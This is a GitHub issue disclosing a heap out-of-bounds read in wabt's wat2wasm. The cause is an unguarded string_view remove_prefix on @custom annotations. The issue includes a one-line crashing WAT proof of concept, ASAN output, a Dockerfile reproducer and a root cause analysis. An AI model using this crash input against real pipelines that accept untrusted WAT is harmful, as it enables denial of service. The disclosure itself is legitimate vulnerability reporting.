Skip to content

heap OOB read / SEGV in BinaryWriter::WriteExpr #2742

@DavidKorczynski

Description

@DavidKorczynski

Description of the vulnerability and its impact

When wat2wasm processes a WAT file containing a @custom annotation inside a function
body (e.g. @custom "a"), ParseCodeMetadataAnnotation calls name.remove_prefix(14)
on the token text "custom" (6 bytes) without first checking that the name starts with
"metadata.code.". This violates the C++ precondition for std::string_view::remove_prefix,
producing a corrupted string_view with a pointer advanced 14 bytes past the token
allocation and a length of 0xFFFFFFFFFFFFFFF8 (unsigned wraparound). The corrupted
view is stored in a CodeMetadataExpr node and later used as a key in
std::unordered_map<std::string_view, CodeMetadataSection> inside BinaryWriter::WriteExpr,
causing the hash function to attempt a read of ~18 exabytes from an invalid address.

Impact: Deterministic crash (DoS) of any pipeline running wat2wasm --enable-annotations
on untrusted input. The corrupted pointer is heap-relative, creating a theoretical (but
non-trivial) memory disclosure primitive.

First faulty condition: src/wast-parser.cc:2314name.remove_prefix(sizeof("metadata.code.") - 1) called without a prior starts_with("metadata.code.") guard.

Crash site: src/binary-writer.cc:1189BinaryWriter::WriteExpr hashes the corrupted string_view.


How to reproduce

echo '(module(func(@custom "a")))' > poc.wat
wat2wasm --enable-annotations poc.wat -o /dev/null

Crashes deterministically on current HEAD. No special heap layout or environment required.

ASAN output:

==10==ERROR: AddressSanitizer: SEGV on unknown address 0x603000010000
==10==The signal is caused by a READ memory access.
    #0 in std::_Hash_bytes(void const*, unsigned long, unsigned long)
    #1 in std::hash<std::string_view>::operator()
    #2 in std::unordered_map<std::string_view, ...>::operator[]
    #3 in wabt::(anonymous namespace)::BinaryWriter::WriteExpr
           /build/repo/src/binary-writer.cc:1189
    #4 in BinaryWriter::WriteExprList /build/repo/src/binary-writer.cc:1203
    #5 in BinaryWriter::WriteFunc    /build/repo/src/binary-writer.cc:1229
    #6 in BinaryWriter::WriteModule  /build/repo/src/binary-writer.cc:1737
    #7 in wabt::WriteBinaryModule    /build/repo/src/binary-writer.cc:1947
    #8 in ProgramMain                /build/repo/src/tools/wat2wasm.cc:152

For a full end-to-end reproducer this Dockerfile reproduces the issue:

FROM ubuntu:24.04

ENV DEBIAN_FRONTEND=noninteractive
ENV TZ=UTC

RUN apt-get update && apt-get install -y --no-install-recommends \
    git \
    cmake \
    ninja-build \
    clang-18 \
    llvm-18 \
    libclang-rt-18-dev \
    python3 \
    ca-certificates \
    && rm -rf /var/lib/apt/lists/*

# Clone wabt at HEAD (unpatched as of April 2026)
RUN git clone --depth=1 --recurse-submodules https://github.com/WebAssembly/wabt.git /build/repo \
    && cd /build/repo && git log -1 --oneline

# Build wat2wasm with ASAN using clang-18
RUN mkdir -p /build/repo/build && \
    cmake -S /build/repo -B /build/repo/build \
        -GNinja \
        -DCMAKE_BUILD_TYPE=Debug \
        -DCMAKE_C_COMPILER=clang-18 \
        -DCMAKE_CXX_COMPILER=clang++-18 \
        "-DCMAKE_C_FLAGS=-fsanitize=address -g -O1 -fno-omit-frame-pointer" \
        "-DCMAKE_CXX_FLAGS=-fsanitize=address -g -O1 -fno-omit-frame-pointer" \
        "-DCMAKE_EXE_LINKER_FLAGS=-fsanitize=address" \
        -DBUILD_TESTS=OFF \
    && ninja -C /build/repo/build wat2wasm

# Embed the PoC: 27-byte WAT text that triggers the bug
RUN echo '(module(func(@custom "a")))' > /build/poc.wat

# Show the vulnerable source region and then trigger the ASAN crash
CMD ["/bin/sh", "-c", \
    "echo '=== Vulnerable source (src/wast-parser.cc — ParseCodeMetadataAnnotation) ===' && \
     grep -n 'remove_prefix' /build/repo/src/wast-parser.cc | head -5 && \
     echo '' && \
     echo '=== ASAN crash ===' && \
     ASAN_OPTIONS='detect_leaks=0:print_stacktrace=1' \
     ASAN_SYMBOLIZER_PATH=$(which llvm-symbolizer-18) \
       /build/repo/build/wat2wasm --enable-annotations /build/poc.wat -o /dev/null 2>&1; exit 1"]

Which WABT tools or library functions are affected

  • Tool: wat2wasm
  • Vulnerable function: WastParser::ParseCodeMetadataAnnotationsrc/wast-parser.cc:2314
  • Crash site: BinaryWriter::WriteExprsrc/binary-writer.cc:1189

Which WebAssembly features must be enabled

--enable-annotations — the crash is only reachable when annotation parsing is
enabled. The @custom token is only accepted under this flag.


Root Cause Analysis

Background

wabt's wat2wasm tool compiles WebAssembly Text Format (WAT) to binary. The --enable-annotations flag activates support for WAT annotations — syntactic extensions of the form (@name ...). One annotation type is metadata.code.*, used to attach custom metadata to instructions for toolchain pipelines. The annotation name must begin with the 14-byte prefix "metadata.code." for this feature to work correctly.

Vulnerable Code

// src/wast-parser.cc:2310 — WastParser::ParseCodeMetadataAnnotation
Result WastParser::ParseCodeMetadataAnnotation(ExprList* exprs) {
  WABT_TRACE(ParseCodeMetadataAnnotation);
  Token tk = Consume();
  std::string_view name = tk.text();
  name.remove_prefix(sizeof("metadata.code.") - 1);  // line 2314 — BUG
  std::string data_text;
  CHECK_RESULT(ParseQuotedText(&data_text, false));
  std::vector<uint8_t> data(data_text.begin(), data_text.end());
  exprs->push_back(std::make_unique<CodeMetadataExpr>(name, std::move(data)));
  EXPECT(Rpar);
  return Result::Ok;
}

Plain explanation: The function assumes that any annotation token reaching it begins with the 14-byte prefix "metadata.code." and strips that prefix unconditionally. When the token is "custom" (6 bytes), stripping 14 bytes is undefined behavior — it produces a string_view pointing past the end of the token buffer with a wrapped, near-maximal length.

Precise explanation: sizeof("metadata.code.") - 1 is 14. Calling remove_prefix(14) on a string_view of size 6 advances the internal data_ pointer by 14 bytes (into adjacent heap memory or lexer state) and sets size_ to 6 - 14 = -8, which as size_t is 0xFFFFFFFFFFFFFFF8. The resulting string_view is stored — without copying — into CodeMetadataExpr::name (a std::string_view member). At binary write time, BinaryWriter::WriteExpr uses this as a key in std::unordered_map<std::string_view, CodeMetadataSection>, which hashes the string_view by calling std::_Hash_impl::hash(data_ptr, 0xFFFFFFFFFFFFFFF8) — a read of ~18 exabytes from an invalid address, immediately caught by ASAN as a SEGV.

The root cause is the absence of a guard in ParseCodeMetadataAnnotation verifying that the annotation name actually starts with "metadata.code." before calling remove_prefix. A corresponding guard exists at module level (in the lexer's annotation token accumulation), but not in the expression-level dispatcher.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions